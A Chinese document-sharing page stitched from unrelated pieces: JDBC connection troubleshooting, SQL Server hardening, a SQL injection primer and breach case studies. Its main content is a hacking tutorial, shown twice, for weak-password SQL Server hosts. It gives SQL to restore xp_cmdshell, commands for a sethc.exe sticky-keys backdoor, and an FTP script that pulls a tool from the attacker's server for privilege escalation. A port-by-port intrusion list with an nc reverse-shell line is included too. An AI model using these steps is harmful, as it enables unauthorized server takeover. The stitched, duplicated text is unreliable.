利用SQL之1433端口巧妙入侵服务器
通过端口1433连接到主机localhost的tcpip连接失败错误“connectionrefused

通过端口1433连接到主机localhost的tcpip连接失败。
错误“connectionrefused&nERROR:通过端口1433 连接到主机localhost 的TCP/IP 连接失败。
错误:“Connection refused:connect。
请验证连接属性,并检查SQL Server 的实例正在主机上运行,且在此端口接受TCP/IP连接,还要确保防火墙没有阻止到此端口的TCP连接。
”。
最近要学数据库,老师用的是microsoft sqlserver2005, 我是学java的,一直都JDBC来连oracle数据库的,这次我装了microsoftsqlserver 2005,想用JDBC 来连microsoft sqlserver 2005,没想出了这样的问题:com.microsoft.sqlserver.jdbc.SQLServerException:通过端口1433连接到主机localhost的TCP/IP连接失败。
错误:“Connection refused:connect。
请验证连接属性,并检查SQLServer的实例正在主机上运行,且在此端口接受TCP/IP连接,还要确保防火墙没有阻止到此端口的TCP连接。
”。
atcom.microsoft.sqlserver.jdbc.SQLServerException.makeFromD riverError(SQLServerException.java:171)atcom.microsoft.sqlserver.jdbc.SQLServerConnection.connectHel per(SQLServerConnection.java:1033)atcom.microsoft.sqlserver.jdbc.SQLServerConnection.login(SQLServerConnection.java:817)atcom.microsoft.sqlserver.jdbc.SQLServerConnection.connect(SQ LServerConnection.java:700)atcom.microsoft.sqlserver.jdbc.SQLServerDriver.connect(SQLSer verDriver.java:842)atjava.sql.DriverManager.getConnection(DriverManager.java:582 )atjava.sql.DriverManager.getConnection(DriverManager.java:185 )atcom.luoying.TestSQLServer2.main(TestSQLServer2.java:15)我的代码如下:。
利用SQL之1433端口巧妙入侵服务器

利用SQL之1433端口巧妙入侵服务器利用1433端口提权相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net没权限情况的提权方法;1、未找到储存过程!那就来修复下吧!用到SQL语句:xp_cmdshell新的恢复办法第一步先删除:drop procedure sp_addextendedprocdrop procedure sp_oacreateexec sp_dropextendedproc 'xp_cmdshell'第二步恢复:dbcc addextendedproc ("sp_oacreate","odsole70.dll")dbcc addextendedproc ("xp_cmdshell","xplog70.dll")直接恢复,不管sp_addextendedproc是不是存在图12、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图23、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL找到了哈哈!图34、恢复!用到SQL语句:第一exec sp_dropextendedproc 'xp_cmdshell'第二dbcc addextendedproc ("xp_cmdshell","d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL")恢复好了图45、提下权 net net1 都拒绝访问!管理降低了权限!图56、于是我想到了后门提权! 居然管理也注意到了后门!写了权限!用到CMD命令:五shift键(前提是能执行DOS命令,并且sethc.exe没加保护)一般只要执行第一步!copy C:\WINDOWS\explorer.exe c:\windows\system32\sethc.execopy C:\WINDOWS\explorer.exe c:\windows\system32\dllcache\sethc.exe图67、插入一点:如果DOS不能执行命令的话!那就用SQL执行替换命令!(成功率比较低!)用到SQL语句:利用SQL分析器开shift后门(一般只要执行第一步!然后进入后,替换自己的后门)第一:declare @o intexec sp_oacreate 'scripting.filesystemobject', @o outexec sp_oamethod @o,'copyfile',null,'C:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';第二:declare @oo intexec sp_oacreate 'scripting.filesystemobject', @oo outexec sp_oamethod @oo,'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 图78、这里是本节的重点了!利用传马的方式提权!首先自己架设一个FTP 或是自己已经有FTP的!把本机的net放到FTP空间里去!随便改个名字!切记不要和net相同即可!把FTP传马方式的语句一句一句复制执行DOS命令!用到CMD命令:echo open FTP> xiuxiu.txt 注意 xiuxiu.txt你可以随意改!但是要和下的相同! echo 帐号>> xxxx.txtecho 密码>> xxxx.txtecho binary >> xxxx.txtecho get net的名字.exe>> xxxx.txtecho bye >> xxxx.txtftp -s:xxxx.txtdel xxxx.txt. /q /f图89、好了!执行下最后一条命令! 嘿嘿!发现和FTP抓鸡方式一样!有鸡来下载!图910、好了!最后一条命令执行成功了!返回以下数据!注意:服务器必须能上网!图1011、我XXxX 我自己的 net好象没加权限吧! 居然不能执行返回了以下数据!发生系统错误5...这很多人都遇见过!其实可以省掉一部分! 以后提权传net的时候不要传net 直接net1 因为所以!我也解释不清楚!图1112、嘿嘿 net1后成功了! 提权成功!图1213、远程登录成功图13。
1433提权全教程

1433端口提权的过程随着网络安全意识的提高,很多服务器的安全防范都非常严了,本人对web入侵是一巧不通就只会扫扫1433弱口令的服务器,于是研究一段时间,虽然进步不大,但是还是想把经验分享一下,正所谓授人以鱼不如授人以渔,而我现在正是告诉你打鱼的方法,下面就以一台服务器为例了,本例使用工具为SQL TOOLS 2.0,论坛有下,请自行搜索。
插播不是广告的广告:该工具集成度高,简单的sql指令无须使用分离器,直接在此工具中执行即可,其文件管理功能非常强大,反正我用着太顺手了,推荐一下,本文原创发布于=华夏黑客同盟论坛=()广告完毕。
把扫到的ip和sa及口令填入连接后,用dos命令功能试试列目录显示错误信息:Error Message:无法装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。
原因: 126(找不到指定的模块。
)。
这种情况大家在提权过程中经验遇到啊,它是由于xplog70.dll这个文件被删除或者做了其他限制,导致出现这个错误的这个错误的直接后果就是sql数据库的xp_cmdshell的存储过程无法使用,无法执行命令提权自然就无从说起了,当然我们还可以考虑其他的存储过程如:sp_oacreate和sp_oamethod来直接添加帐号,或者使用沙盘指令来提权,但这台服务器,这些功能都被限制了,还是考虑下恢复xplog70.dll了,测试上传无法成功,这条路走不通了,这时就考虑用到工具的文件管理功能了看到了把,和windows的资源管理器一样好用,目录列出来了,搜索一下可以用来提权的东西吧,这里我们首先要去看看sql的安装路径里的xplog70.dll文件是否存在看到吧,xplog70.dll文件不见了,被删除了,xpweb70.dll也被改了名字了-. - 继续搜寻下其他盘看看还有什么东西d盘下有几个网站和几个论坛,这些都是有用的信息,一旦sql的错误无法恢复的时候,我们就可以考虑通过这些网站来进行提权了,网站的提权,我就是搞不定,痛苦啊==!!继续搜索在e盘下竟然有个sql2000的原始安装文件备份,怦然心动的感觉是美妙的,感谢我们亲爱的服务器管理员大人,看看这是什么====e:\备份软件\MS Sql 2000\DEVELOPER\X86\BINN\那我们就开始恢复试试吧,切换到sql命令项,输入指令exec sp_dropextendedproc 'xp_cmdshell' //这个指令是删除sql数据库的xp_cmdshell的存储过程接着输入指令,重新加载新路径的存储过程。
SQL注入攻击是黑客对数据库进行攻击的常用手段

SQL注入攻击是黑客对数据库进行攻击的常用手段之一。
随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。
但是由于程序员的水平及经验也参差不齐,相当大一部分程序员在编写代码的时候,没有对用户输入数据的合法性进行判断,使应用程序存在安全隐患。
用户可以提交一段数据库查询代码,根据程序返回的结果,获得某些他想得知的数据,这就是所谓的SQL Injection,即SQL注入。
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。
但是,SQL注入的手法相当灵活,在注入的时候会碰到很多意外的情况。
能不能根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据,是高手与“菜鸟”的根本区别。
下面从SOL注入的背景讲起,再谈谈如何防御等问题。
一SQL注入攻击的背景:在计算机技术高速发展的今天,越来越让人们头疼的是面临越来越“变态”和复杂的威胁网站技术,他们利用Internet 执行各种恶意活动,如身份窃取、私密信息窃取、带宽资源占用等。
它们潜入之后,还会扩散并不断更新自己。
这些活动常常利用用户的好奇心,在用户不知道或未来允许的情况下潜入用户的PC,不知不觉中,帐户里的资金就被转移了,公司讯息也被传送出去,危害十分严重。
2006年8月16日,第一个Web威胁样本出现,截止到2006年10月25日,已经产生了第150个变种,并且,还在不断地演化下去。
网站威胁的目标定位有多个维度,是个人还是公司,还是某种行业,都有其考虑,甚至国家、地区、性别、种族、宗教等也成为发动攻击的原因或动机。
攻击还会采用多种形态,甚至是复合形态,比如病毒、蠕虫、特洛伊、间谍软件、僵尸、网络钓鱼电子邮件、漏洞利用、下载程序、社会工程、rootkit、黑客,结果都可以导致用户信息受到危害,或者导致用户所需的服务被拒绝和劫持。
各个端口的入侵方法(入侵菜鸟必看)

各个端口的入侵方法(入侵菜鸟必看)1. 1433端口入侵scanport.exe 查有1433的机器SQLScanPass.exe 进行字典暴破(字典是关键)最后SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
nc -vv -l -p 本机端口sqlhelloF.exe 入侵ip 1433 本机ip 本机端口(以上反向的,测试成功)sqlhelloz.exe 入侵ip 1433 (这个是正向连接)2. 4899端口入侵用4899过滤器.exe,扫描空口令的机器3. 3899的入侵对很早的机器,可以试试3389的溢出(win3389ex.exe)对2000的机器,可以试试字典暴破。
(tscrack.exe)4. 80入侵对sp3以前的机器,可以用webdav入侵;对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)可以利用SQL进行注入。
(小榕的注入软件)。
5. serv-u入侵(21端口)对5. 004及以下系统,可用溢出入侵。
(serv5004.exe)对5.1.0.0及以下系统,可用本地提升权限。
(servlocal.exe)======================================对serv-u的MD5加密密码,可以用字典暴破。
(crack.vbs)输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码。
如:cscript crack.vbs ib0AD10648F17E9E8D1FF316C1BA75105A6. 554端口用real554.exe入侵。
7. 6129端口用DameWare6129.exe入侵。
8. 系统漏洞利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
9. 3127等端口可以利用doom病毒开的端口,用nodoom.exe入侵。
电子商务安全的案例分析

电子商务安全的案例分析电子商务发展给人类社会带来的巨大影响使一系列相关领域的研究成为全球热点。
近年来,电子商务的发展已逐步放慢了脚步,其中安全问题是阻碍其发展的主要原因之一。
以下是店铺分享给大家的关于电子商务安全的案例,一起来看看吧!电子商务安全的案例篇12012年1月,亚马逊旗下美国电子商务网站Zappos遭到黑客网络攻击,2400万用户的电子邮件和密码等信息被窃取。
同年7月,雅虎、Linkedin和安卓论坛累计超过800万用户信息泄密,而且让人堪忧的是,部分网站的密码和用户名称是以未加密的方式储存在纯文字档案内,意味着所有人都可使用这些信息。
电子商务安全的案例篇21999年11月该网站运行于Windows NT 4.0上,web server为IIS4.0,补丁号为Service Pack5。
该网站管理员在11月的某一天发现其web网站上的用户资料和电子配件数据库被入侵者完全删除!严重之处更在于该数据库没有备份,网站运行半年来积累的用户和资料全部丢失。
系统管理员反复检查原因,通过web日志发现破坏者的调用web程序记录,确定了当时用户的IP是202.103.xxx.xxx(出于众所周知的原因这里隐藏了后两位),而这个IP来自于某地一个ISP的一台代理服务器。
这个202.103.xxx.xx的服务器安装了Wingate的代理软件。
破坏者浏览电子公司的网站是用该代理访问的。
这件事情给电子公司带来的损失是很严重的,丢失了半年的工作成果。
入侵者同时给202.103.xxx。
xxx带来了麻烦,电子公司报了案,协查通报到了202.103.xxx。
xxx这个ISP所在地的公安局。
该代理服务器的系统管理员是本站一位技术人员F的朋友。
F通过对受害者的服务器进行安全检查发现了原因。
首先,其端口1433为开放,SQL数据库服务器允许远程管理访问;其次,其IIS服务器存在ASP的bug,允许任何用户查看ASP源代码,数据库管理员帐号sa和密码以明文的形式存在于ASP 文件中。
通过端口1433连接到主机127...

通过端⼝1433连接到主机127...我们在连接数据库时总会出现⼀些问题,今天给⼤家分享遇到通过端⼝1433连接到主机127.0.0.1的 TCP/IP 连接失败。
错误:“connect timed out的解决办法。
环境:SQLServer 2008 R2 + MyEclipse 6.5 + JDK 1.6.24问题:Java通过JDBC连接SQLServer 2008,出现如下问题:通过端⼝1433 连接到主机127.0.0.1 的TCP/IP 连接失败。
错误:“connect timed out。
请验证连接属性,并检查 SQL Server 的实例正在主机上运⾏,且在此端⼝接受 TCP/IP 连接,还要确保防⽕墙没有阻⽌到此端⼝的 TCP 连接。
解决⽅案:1. 打开SQLServer 配置管理器------->SQLServer for MSQLSERVER------->TCP/IP------->如果没有启动,则启动------->右键属性------->IPAddresses------->IP All------->将TCP端⼝改为1433;2. 打开SQLServer 配置管理器------->SQL Native Client 10.0 Configuration------->CP/IP------->如果没有启动,则启动------->右键属性------->将Default Port(默认端⼝)改为1433;3. 控制⾯板------->系统和安全------->Windows FireWall(Windows 防⽕墙)------->TurnWindows FireWall on or off------->将Windows防⽕墙关闭。
问题得到了完美解决。
在实际操作的时候总会碰到各种各样的错误,最好的办法就是把它记录下来,以后再遇到相同问题时,就省去很多⿇烦。
1433端口安全防护

究竟什么是1433端口呢??,1433端口是SQL Server默认的端口,SQL Server服务使用两个端口:TCP-1433、UDP-1434。
其中1433用于供SQL Server对外提供服务,1434用于向请求者返回SQL Server使用了哪个TCP/IP端口。
很多人都说SQL Server配置的时候要把1433端口改变,这样别人就不能很容易地知道使用的什么端口了。
可惜,通过微软未公开的1434端口的UDP探测可以很容易的知道SQL Server使用了什么TCP/IP端口。
不过微软还是考虑到了这个问题,毕竟公开而且开放的端口会引起不必要的麻烦。
在实例属性中选择TCP/IP协议的属性。
选择隐藏SQL Server 实例。
如果隐藏了SQL Server 实例,则将禁止对试图枚举网络上现有的SQL Server 实例的客户端所发出的广播作出响应。
这样,别人就不能用1434来探测你的TCP/IP端口了(除非用Port Scan。
知道什么是1433端口了,鉴于对SQL数据库的入侵,大部分都是通过1433端口实现的,(额补充下MYSQL的默认端口是3306,原理是一样的)可以用很多端口扫描工具看看是否开启了这个端口。
关于如何入侵,怎么入侵,就不多说了,嘿嘿,网上也有很多,这里要注意的是,防止入侵,关了这个端口就OK了,请看下面的教程。
一.创建IP筛选器和筛选器操作1."开始"->"程序"->"管理工具"->"本地安全策略"。
微软建议使用本地安全策略进行IPsec的设置,因为本地安全策略只应用到本地计算机上,而通常ipsec都是针对某台计算机量身定作的。
2.右击"Ip安全策略,在本地机器",选择"管理IP 筛选器表和筛选器操作",启动管理IP 筛选器表和筛选器操作对话框。
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
利用SQL之1433端口巧妙入侵服务器
利用1433端口提权
相信大家扫到很多1433 都提示用net net1 提权都说拒绝访问!且又无法上传!今天给大家针对Net 没权限情况的提权方法;
1、未找到储存过程!那就来修复下吧!
用到SQL语句:
xp_cmdshell新的恢复办法
第一步先删除:
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp_cmdshell'
第二步恢复:
dbcc addextendedproc ("sp_oacreate","odsole70.dll")
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
直接恢复,不管sp_addextendedproc是不是存在
图1
2、修复好了!又出现问题了!xplog70.dll被删除了!看来只有用授鱼的那修复法!图2
3、d:\应用软件\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL
找到了哈哈!
图3
4、恢复!
用到SQL语句:
第一
exec sp_dropextendedproc 'xp_cmdshell'
第二
dbcc addextendedproc ("xp_cmdshell","d:\应用软件
\SQLServer2000MicrosoftSQLServer2000SP4简体中文企业光盘版\SP4\x86\binn\xplog70.dLL") 恢复好了
图4
5、提下权net net1 都拒绝访问!管理降低了权限!图5
6、于是我想到了后门提权! 居然管理也注意到了后门!写了权限!
用到CMD命令:
五shift键(前提是能执行DOS命令,并且sethc.exe没加保护)一般只要执行第一步!copy C:\WINDOWS\explorer.exe c:\windows\system32\sethc.exe
copy C:\WINDOWS\explorer.exe c:\windows\system32\dllcache\sethc.exe
图6
7、插入一点:如果DOS不能执行命令的话!那就用SQL执行替换命令!(成功率比较低!)用到SQL语句:
利用SQL分析器开shift后门(一般只要执行第一步!然后进入后,替换自己的后门)第一:
declare @o int
exec sp_oacreate 'scripting.filesystemobject', @o out
exec sp_oamethod @o,
'copyfile',null,'C:\WINDOWS\explorer.exe' ,'c:\windows\system32\sethc.exe';
第二:
declare @oo int
exec sp_oacreate 'scripting.filesystemobject', @oo out
exec sp_oamethod @oo,
'copyfile',null,'c:\windows\system32\sethc.exe' ,'c:\windows\system32\dllcache\sethc.exe'; 图7
8、这里是本节的重点了!利用传马的方式提权!
首先自己架设一个FTP 或是自己已经有FTP的!
把本机的net放到FTP空间里去!随便改个名字!切记不要和net相同即可!
把FTP传马方式的语句一句一句复制执行DOS命令!
用到CMD命令:
echo open FTP> xiuxiu.txt 注意xiuxiu.txt你可以随意改!但是要和下的相同! echo 帐号>> xxxx.txt
echo 密码>> xxxx.txt
echo binary >> xxxx.txt
echo get net的名字.exe>> xxxx.txt
echo bye >> xxxx.txt
ftp -s:xxxx.txt
del xxxx.txt. /q /f
图8
9、好了!执行下最后一条命令! 嘿嘿!发现和FTP抓鸡方式一样!有鸡来下载!图9
10、好了!最后一条命令执行成功了!返回以下数据!
注意:服务器必须能上网!
图10
11、我XXxX 我自己的net好象没加权限吧! 居然不能执行
返回了以下数据!发生系统错误5...这很多人都遇见过!
其实可以省掉一部分! 以后提权传net的时候不要传net 直接net1 因为所以!我也解释不清楚!
图11
12、嘿嘿net1后成功了! 提权成功!图12
13、远程登录成功图13。